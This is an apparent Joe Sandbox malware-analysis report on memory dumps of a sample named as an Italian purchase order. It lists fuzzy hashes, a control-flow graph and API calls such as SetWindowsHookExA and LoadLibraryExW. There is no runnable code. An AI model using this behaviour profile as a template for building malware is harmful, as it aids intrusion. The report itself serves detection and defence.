                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5b00ca4fd426c13fd037750860486048963ddfddde70c18edc97b773f00f09c4
                                                        • Instruction ID: 3a174076a0676131c2a2a22f187e71da4d7708a03b5d480dde02e1ac90de9913
                                                        • Opcode Fuzzy Hash: 5b00ca4fd426c13fd037750860486048963ddfddde70c18edc97b773f00f09c4
                                                        • Instruction Fuzzy Hash: 082263B0E1020A8FDF24CA7DD5A07AEB7A6FB89314F148825E446EB395CB35DC85CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6a74a021e3eaf67f45b2ad8e4ce91b82ff747c6d45d7753cc9cb53d3ea7aab3f
                                                        • Instruction ID: cf8e6ca69f48efa6294458742cf7118ddf642f25583cdbee0fb9f58ca3211930
                                                        • Opcode Fuzzy Hash: 6a74a021e3eaf67f45b2ad8e4ce91b82ff747c6d45d7753cc9cb53d3ea7aab3f
                                                        • Instruction Fuzzy Hash: DDD13DB0E10309CFDB15EFA9C848BADBBB1BF44304F158159D406AB3A5DB74AD49CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d00a6278bb4334016bf06430ec91d61837b602d0bb65b0a56cf97f18a9ef2c15
                                                        • Instruction ID: 4cfb2b23dd2d7a674c2555bea19a555db497041db9c6e0973bfa3100a5d0c46d
                                                        • Opcode Fuzzy Hash: d00a6278bb4334016bf06430ec91d61837b602d0bb65b0a56cf97f18a9ef2c15
                                                        • Instruction Fuzzy Hash: 5BB15EB0E0020ACFDB55DFA9C88579DBBF2BF88704F148129E815AB394EB749849CF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc391859a8d9dfb37ef2e332b509eb14e17852cfe2e2e8b761660795df19bd4d
                                                        • Instruction ID: bf82b0ac0cb8ad918fe4ff6ba4f039f90e6fd4d933a9678861b4e68430ce2906
                                                        • Opcode Fuzzy Hash: bc391859a8d9dfb37ef2e332b509eb14e17852cfe2e2e8b761660795df19bd4d
                                                        • Instruction Fuzzy Hash: 4EB160B0E0020ACFDF55EFA9D89179DBBF6AF88314F148129D815E7294EB749846CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2db184f1c7ff29a722e86e4fd69486663405e5d2f1214076a58b5bb6f2a71236
                                                        • Instruction ID: af718d130eb645107a6ee8cb7dfe3a6e44a8dfd6adc9e8c984b5ce4eb9f2fe86
                                                        • Opcode Fuzzy Hash: 2db184f1c7ff29a722e86e4fd69486663405e5d2f1214076a58b5bb6f2a71236
                                                        • Instruction Fuzzy Hash: 41917EB4E00209DFDF55DFA9C99179DBBF2AF88314F248129E419E7294EB349849CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15e597975200e02e492bcd381fd1e2183e55afad4d8539430f2a1814ac1be867
                                                        • Instruction ID: 102b580c0459f6b637971da4736e044f33eca7d4c78283ba63db940c36ba084a
                                                        • Opcode Fuzzy Hash: 15e597975200e02e492bcd381fd1e2183e55afad4d8539430f2a1814ac1be867
                                                        • Instruction Fuzzy Hash: A82116B0D046188BEB5DDF9BD8547EEBAF6BFC9300F14C06AD409B6298EB7409458F60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a937a7ae3a297c5eb42c8f4dd5ce19b08db58d9f5c4d71dd87ffa5f46f77cceb
                                                        • Instruction ID: 42be5d8967c082d3efc0308b1fca6549e1df1f89bd48bd0820a86c33105c0a73
                                                        • Opcode Fuzzy Hash: a937a7ae3a297c5eb42c8f4dd5ce19b08db58d9f5c4d71dd87ffa5f46f77cceb
                                                        • Instruction Fuzzy Hash: 2A21D5B0D046188BEB5DDF9BD9547EEBAF6BFC9300F14C02AD40966298DB7409458FA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1405 24cae70-24cae7f 1406 24caeab-24caeaf 1405->1406 1407 24cae81-24cae8e call 24c9878 1405->1407 1408 24caeb1-24caebb 1406->1408 1409 24caec3-24caf04 1406->1409 1414 24caea4 1407->1414 1415 24cae90 1407->1415 1408->1409 1416 24caf06-24caf0e 1409->1416 1417 24caf11-24caf1f 1409->1417 1414->1406 1460 24cae96 call 24cb0f8 1415->1460 1461 24cae96 call 24cb108 1415->1461 1416->1417 1419 24caf21-24caf26 1417->1419 1420 24caf43-24caf45 1417->1420 1418 24cae9c-24cae9e 1418->1414 1421 24cafe0-24cb0a0 1418->1421 1423 24caf28-24caf2f call 24ca854 1419->1423 1424 24caf31 1419->1424 1422 24caf48-24caf4f 1420->1422 1455 24cb0a8-24cb0d3 GetModuleHandleW 1421->1455 1456 24cb0a2-24cb0a5 1421->1456 1425 24caf5c-24caf63 1422->1425 1426 24caf51-24caf59 1422->1426 1427 24caf33-24caf41 1423->1427 1424->1427 1430 24caf65-24caf6d 1425->1430 1431 24caf70-24caf79 call 24ca864 1425->1431 1426->1425 1427->1422 1430->1431 1436 24caf7b-24caf83 1431->1436 1437 24caf86-24caf8b 1431->1437 1436->1437 1439 24caf8d-24caf94 1437->1439 1440 24cafa9-24cafad 1437->1440 1439->1440 1441 24caf96-24cafa6 call 24ca874 call 24ca884 1439->1441 1443 24cafb3-24cafb6 1440->1443 1441->1440 1445 24cafb8-24cafd6 1443->1445 1446 24cafd9-24cafdf 1443->1446 1445->1446 1457 24cb0dc-24cb0f0 1455->1457 1458 24cb0d5-24cb0db 1455->1458 1456->1455 1458->1457 1460->1418 1461->1418
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 024CB0C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 024C59C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024CD306,?,?,?,?,?), ref: 024CD3C7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,024CD306,?,?,?,?,?), ref: 024CD3C7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 076DC38B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: HookWindows
                                                        • String ID:
                                                        • API String ID: 2559412058-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 076DC38B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: HookWindows
                                                        • String ID:
                                                        • API String ID: 2559412058-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,024CB141,00000800,00000000,00000000), ref: 024CB352
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,024CB141,00000800,00000000,00000000), ref: 024CB352
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 076D7BAF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4129666908.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_76d0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 024CB0C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120972982.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_24c0000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q
                                                        • API String ID: 0-671973202
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: bdHE
                                                        • API String ID: 0-3248747386
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: d/dq
                                                        • API String ID: 0-2156024220
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120154710.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_85d000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 38513a384b7f1c7a1092e21ca9941d33a1377b6bd0603147b24e3bd65979d693
                                                        • Instruction ID: 6092bf2355ceb025a1dd2d6542b901deb6f48b6b133c6a25e27dc9d7835e108d
                                                        • Opcode Fuzzy Hash: 38513a384b7f1c7a1092e21ca9941d33a1377b6bd0603147b24e3bd65979d693
                                                        • Instruction Fuzzy Hash: B7212271500344DFCB25DF14D9C0B2ABF65FB98319F20C5A9EC098B256D336D85ACAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120154710.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_85d000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 33db46495f37a7162378d431f497ff0779e1de67a1996772db98a3834e14c1a4
                                                        • Instruction ID: 70fd24c1403a555c62307ee85ab648838bc91b88f8359e26b38663003f998710
                                                        • Opcode Fuzzy Hash: 33db46495f37a7162378d431f497ff0779e1de67a1996772db98a3834e14c1a4
                                                        • Instruction Fuzzy Hash: E9212571500304DFDB25DF14D9C0B26BF65FB98325F20C169ED098F256C33AE85ACAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120200038.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_86d000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120200038.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_86d000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4130059340.0000000009D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9d60000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120154710.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_85d000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120154710.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_85d000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 489a79d61b15155d91a14625618b3a57dd711117c285f73ceb1068b8605dbe36
                                                        • Instruction ID: 9621c6a092cc5475c8b5968095d97951844ea5fce3073ba27e5310a03554328e
                                                        • Opcode Fuzzy Hash: 489a79d61b15155d91a14625618b3a57dd711117c285f73ceb1068b8605dbe36
                                                        • Instruction Fuzzy Hash: 77F0F975D2810897CB489EA4E4061FDBBB9EBCB221F016066D44673591DF3859418A56
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120200038.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4120154710.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52dd645964b741668142767460a1569baeb4019ce7c63b341e9a7c88278d306b
                                                        • Instruction ID: 8ef7249da48433fb19312ae855e104d07d2c6f334a001c0bed04cdb7627c1ee6
                                                        • Opcode Fuzzy Hash: 52dd645964b741668142767460a1569baeb4019ce7c63b341e9a7c88278d306b
                                                        • Instruction Fuzzy Hash: BAF08CB0A0D208DBC748EF5AD4409BDFBB8EB4A700F0992A4D0299B295D7309A06DF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d1d29fd3ce4c8f7be9d6e22734d600ae5745e707eb98006dc67bbc40348acb40
                                                        • Instruction ID: 2d98b92ef424f01817d095d0109a452b58226aa1123cc76a91b9948b43599c1c
                                                        • Opcode Fuzzy Hash: d1d29fd3ce4c8f7be9d6e22734d600ae5745e707eb98006dc67bbc40348acb40
                                                        • Instruction Fuzzy Hash: 3A01A9B4D00249AFCB44EFA9D541AAEBFF5FB08301F14819AE954E7391E7349A40DF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 69228cb10503f02d8fbb9f1d150442e88d13f8942aabff0f85f74999d184c802
                                                        • Instruction ID: 2247187ea2a860281c4b82f442f4459a9ca987d8b4c16a895382817f8ffa5d92
                                                        • Opcode Fuzzy Hash: 69228cb10503f02d8fbb9f1d150442e88d13f8942aabff0f85f74999d184c802
                                                        • Instruction Fuzzy Hash: 9801A9B4D00249AFCB44DFA9D541AAEBBF5FB08301F148196E954E7381E7349A40DF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.4128327173.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7180000_PUK ITALIA PO 120610549.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ceb7de183debc104720bc7bb281440ad95bbc3868c4f3339dcdc0687bbcae1d7
                                                        • Instruction ID: 2e2ef9884318e7ba2409b2bb5dc10281149241b2363c56d1257c69d7cef6a4fe
                                                        • Opcode Fuzzy Hash: ceb7de183debc104720bc7bb281440ad95bbc3868c4f3339dcdc0687bbcae1d7
                                                        • Instruction Fuzzy Hash: 4A01E874A14308DFDB44DFA8D984AACBBB6FB0A302F215118E40AAB395D730AD05CF00
